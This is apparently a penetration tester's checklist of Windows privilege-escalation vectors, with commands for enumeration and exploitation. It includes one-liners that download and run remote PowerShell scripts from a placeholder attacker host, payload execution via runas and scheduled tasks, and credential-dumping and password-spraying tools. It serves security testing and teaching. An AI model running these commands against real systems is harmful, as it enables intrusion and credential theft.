Windows Privilege Escalation Checklist
Introduction
Privilege escalation is a crucial step in the penetration testing lifecycle, through this checklist I intend to cover all the main vectors used in Windows privilege escalation, and some of my personal notes that I used in previous penetration tests.
Manual Checks
| Command/Action | Description |
|---|---|
| systeminfo; whoami /all; net users; netstat -ano, ipconfig /all; tasklist etc. | Perform basic information gathering steps. |
| Type c:\sysprep.inf, %WINDIR%\Panther\Unattended.xml etc. | Check for files containing passwords or hashes. More info here. |
| reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated | Check for the “AlwaysInstallElevated” registry setting, if this is enabled it allows all users install *.msi files as NT AUTHORITY\SYSTEM. More info here. |
| accesschk.exe -uwqs “Authenticated Users” * | Check for Weak Permissions in the OS. This allows to reconfigure a service and make it run an arbitrary executable. More info here. |
| Check for Unquoted Service Paths | If services have unquoted service paths, these can be used to run malicious executable files. More info here. |
| whoami /priv; | Check for the SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege privileges. Juicy/Rotten Potato can be used to exploit this. More info here. |
| cmdkey /list; runas /savecred /user:WORKGROUP\Administrator ” \\IP\SHARE\EVIL.exe” | Use the Runas command to run commands as a privileged user using saved credentials. More info here. |
| wsl python -c ‘BIND_OR_REVERSE_SHELL_PYTHON_CODE’ | Check if Windows Subsystem for Linux is enabled in the machine, if so this can be exploited to get a bind/reverse shell. |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | Check level of patch to find kernel exploits. Use findstr with the KB patch numbers to display installed patches and see if any are missing. |
| PsExec.exe -i -s cmd.exe; .\psgetsys.ps1 | Check if we are a local admin, if so we can escalate to NT SYSTEM. |
| icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup | Check if we have access to the Startup folder. This can be used to run malicious executables. |
| [System.IO.Directory]::GetFiles(“\\.\pipe\”) | Check for Named Pipes. This can be exploited to obtain the privileges of a process connecting to them. |
| Insecure GUI apps | Check for GUI apps running as SYSTEM allowing an user to spawn a Command Prompt, or browse directories. |
| at 08:00 /interactive “C:\Windows\temp\Payload.exe” | Create a scheduled task which will execute malicious code. |
| MS08-067, MS10-015, MS11-080, MS15-051, MS16-032, MS17-010, CVE-2019-1388 etc. | Check for Common Vulnerabilities and Exposure. |
Automated Checks
| Command/Action | Description |
|---|---|
| Watson.exe | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. |
| winPEASany.exe; winPEASx64.exe; winPEASx86.exe | Script used to check for common privilege escalation vulnerabilities on a target system. |
| IEX(New-Object Net.Webclient).downloadString(‘http://IPADDR:PORT/PowerUp.ps1) | This script will run all common areas of misconfiguration that allow for a regular user to get a local administrative or system account. |
| powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 | JAWS is PowerShell script designed to help quickly identify potential privilege escalation vectors on Windows systems. |
| systeminfo > systeminfo.txt; wesng.py systeminfo.txt | Tool based on the output of the systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to |
| Seatbelt.exe | C# tool that does a number of security oriented “safety checks” relevant for both offensive and defensive security. |
| beRoot.exe | BeRoot(s) is a post exploitation tool to check common Windows misconfigurations to find a way to escalate privilege. |
| IEX(New-Object Net.Webclient).downloadString(‘http://IPADDR:PORT/Invoke-WCMDump.ps1) | PowerShell script to dump Windows credentials from the Credential Manager |
| IEX(New-Object Net.Webclient).downloadString(‘http://IPADDR:PORT/SessionGopher.ps1) | PowerShell tool to find and decrypt saved session information for remote access tools. (e.g. PuTTY) |
| LaZagne.exe | Application used to retrieve lots of passwords stored on a local computer from commonly-used software. |
| IEX(New-Object Net.Webclient).downloadString(‘http://IP:PORT/DomainPasswordSpray.ps1) | PowerShell tool to perform a password spray attack against users of a domain. |
| windows-privesc-check2.exe –audit -a -o wpc-report | Application that tries to find misconfigurations that could allow local unprivileged users to escalate privileges. |
Conclusion
Privilege escalation is a topic that can often scare beginners, due to the amount of vectors and techniques that you are required to learn. However, with the above check list you should be able to deal with most situations, although don’t fully rely on checklists and automated scripts as these can often fail or miss something, but do your own research as well.
